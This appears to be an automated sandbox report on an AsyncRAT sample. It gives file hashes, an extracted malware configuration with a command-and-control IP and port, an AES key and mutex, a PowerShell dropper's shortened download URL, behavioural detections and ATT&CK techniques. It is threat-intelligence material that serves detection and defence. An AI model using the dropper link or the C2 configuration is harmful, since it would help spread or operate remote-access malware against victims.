General

  • Target

    SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529

  • Size

    75KB

  • Sample

    201111-79kmhz5xjs

  • MD5

    3ee1d217550d9a55c163425be47b8011

  • SHA1

    1bbfcfca3f3825519f9f788e22e44729b8076ead

  • SHA256

    e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5

  • SHA512

    e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/7gX8MWJ

Extracted

Family

asyncrat

Version

0.5.7B

C2

54.246.188.45:6606

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    V4QtIrUXBLtj5uq2coY1jhHCz0hmygkt

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    54.246.188.45

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6606

  • version

    0.5.7B

aes.plain

Targets

    • Target

      SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529

    • Size

      75KB

    • MD5

      3ee1d217550d9a55c163425be47b8011

    • SHA1

      1bbfcfca3f3825519f9f788e22e44729b8076ead

    • SHA256

      e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5

    • SHA512

      e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Async RAT payload

    • Blacklisted process makes network request

    • Executes dropped EXE

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks